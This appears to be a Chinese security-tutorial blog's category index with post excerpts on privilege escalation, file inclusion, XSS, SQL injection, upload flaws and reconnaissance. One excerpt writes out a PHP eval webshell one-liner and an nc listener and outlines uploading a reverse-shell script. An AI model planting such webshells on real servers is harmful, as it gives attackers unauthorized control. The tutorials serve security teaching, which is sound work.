随笔分类 - 网络安全基础
摘要:Linux内核提权 一般情况下,web网站都是普通权限,如果想获取root权限,这个时候就得需要提权 使用nc监听端口 nc -l 1234 上传一句话木马 <?php @eval($_POST[nb]); ?> 使用中国菜刀连接服务器 使用中国菜刀上传:perl-reverse-shell.pl
阅读全文
摘要:文件包含漏洞 什么是文件包含漏洞 文件包含:指的是脚本语言程序支持文件包含函数,开发者为了避免再次编写代码,将这些代码插入到指定的地方,在需要的时候直接调用该文件,这种操作就称之为文件包含。如果我们对这些文件具有读取权限的话,就会导致了文件包含漏洞。 php常见的高危文件包含函数 include()
阅读全文
摘要:XSS漏洞 XSS攻击全称为跨站脚本攻击,允许恶意用户将将代码植入到web网站里,供其他用户访问,当其他用户访问到恶意代码的网友就会产生xss攻击 危害 盗取用户账号,比如普通用户账号、管理员账号、银行用户账号等 控制企业数据,包括读取、篡改、添加、删除企业数据,盗取企业核心数据 非法转账 强制发送
阅读全文
摘要:1 什么是SQL注入 一种将SQL语句插入到用户输入的参数中,进行攻击,这些会通过后端服务器传入到SQL服务器,执行对应的SQL语句,比如可以获取数据库信息、用户信息、管理员权限等 2 常见的SQL注入技巧 2.1 识别数据库类型 常见的数据库类型有:Oracle、MySQL、SQL Server、
阅读全文
摘要:1 基础概念 文件上传漏洞主要指的是,在进行文件上传时,前端和后端都没进行文件校验,导致黑客可以上传任务文件,包括可执行脚本,从而获得网站权限 1.1 常见文件上传验证 后缀名,黑白名单 文件类型,可以通过Content-Type来获取 文件头检测 常见文件头信息: JPEG (jpg),文件头:F
阅读全文
摘要:服务信息收集主要包括:域名信息、服务器相关信息(比如IP、CDN、端口等)、Web指纹信息、旁站信息等 1 域名信息收集 通过域名收集,目的是找到服务的相关信息,比如域名所有人、注册商、注册商邮箱等,一般对于小型的网站,注册商一般就是个人,即找到注册商信息,就是个人信息 1.1 whois的使用 可
阅读全文
摘要:常用的搜索引擎有:Google,Baidu,Shodan,fofa,zoomeye等 1.1 Google Hack的使用 1.1.1 逻辑运算符 默认使用的是AND关系,比如: 可以通过OR(或者|)来改变,比如: 如果有多个关键词,也可以通过()指定分组,比如: 如果在搜索的时候,需要过滤掉某些
阅读全文
